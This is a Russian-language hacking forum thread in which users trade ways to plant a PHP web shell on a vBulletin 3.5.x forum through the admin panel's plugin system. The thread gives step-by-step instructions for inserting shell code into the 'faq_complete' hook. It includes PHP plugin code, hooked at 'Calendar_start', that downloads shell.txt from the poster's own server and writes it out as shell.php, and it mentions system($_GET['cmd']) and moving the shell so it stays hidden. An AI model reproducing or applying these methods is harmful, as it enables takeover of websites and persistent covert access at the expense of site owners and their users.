В поиске был, так ничего и не нашёл. -)
Имею доступ к админке, можно ли всётаки как нибудь залить шелл?

Наверное никак...

Хватит дезинформировать народ.. Залить можно через модули.. Видео скора сниму...

Не знаю можно ли это на 3.5.3. Но попробуй пройтись по одной из ссылок внизу топика. ShAnKaR описывал.

Хватит дезинформировать народ.. Залить можно через модули.. Видео скора сниму...

Можно объяснить по подробней, а то пока видео дождёшься...

А ты через смайлы пробовал , у меня тожа один раз такая проблемка вышла , я даже сам не поверл когда залил шелл через смайлики.

А нужно именно залить? Там же вроде в шалоны можно Php-код вставлять .... Или нет?=) Заинклудь шелл со своего хоста а там разбирёшься=)

Ладно - обойдёмся без видео:
Берешь шелл не больше 60кб,
Адмминка-Система модулей- добавить новый модуль.
Продукт Vbulletin
Месторасположение: Vbulletin: Справка - faq_complete
В тело вставляешь код шелла предварительно убрав в начале <? и в конце ?>
Затем прост о заходишь в справку из форума и любуешся своим шеллом.

Советую сразу перезалить шелл в другое место - а этот удалить - мало-ли кому взбредёт справку глянуть :)

Geniy
на 3.5.4 у меня не пашет=(

2 ALL
вот мой немного дебильный способ=)

Заливаем куда-нить с себе на хост шелл под именем - "shell.txt"

Создаём новый модуль. Местоположение хака - "Calendar_start"
Даём ему какое-нить неприметное имя=)
И пишем код:

$file = fopen("http://ВАШ_СЕРВЕР.ru/shell.txt", "r");
$fp = fopen('shell.php', 'a');
while ($line = fgets($file, 4096) )
{
$line.="\n";
fwrite($fp, ''.$line.'');
}
fclose($fp);
fclose($file);


теперь идём по ссылке - _http://servak.com/forum/shell.php - вот он наш шелл.

Проверял всё это дело на локалхосте - работает. Работоспособность будет зависеть от настроек апача, или что там у вас стоит=). Конечно способ идиотский, но у меня на локалхосте больше ничего не срабатывало=( : ни инклудинг, ни "system($id);", ни через смайлы ... ТОлько вот этот способ=)

Видимо обычный system($_GET["cmd"]); ужэ не рулёз )

Мой способ прекрасно работает на 3.5.4. Видно у тя шелл больше 60 кб.

Ладно - обойдёмся без видео:
Берешь шелл не больше 60кб,
Адмминка-Система модулей- добавить новый модуль.
Продукт Vbulletin
Месторасположение: Vbulletin: Справка - faq_complete
В тело вставляешь код шелла предварительно убрав в начале <? и в конце ?>
Затем прост о заходишь в справку из форума и любуешся своим шеллом.

Советую сразу перезалить шелл в другое место - а этот удалить - мало-ли кому взбредёт справку глянуть :)
Благадорю.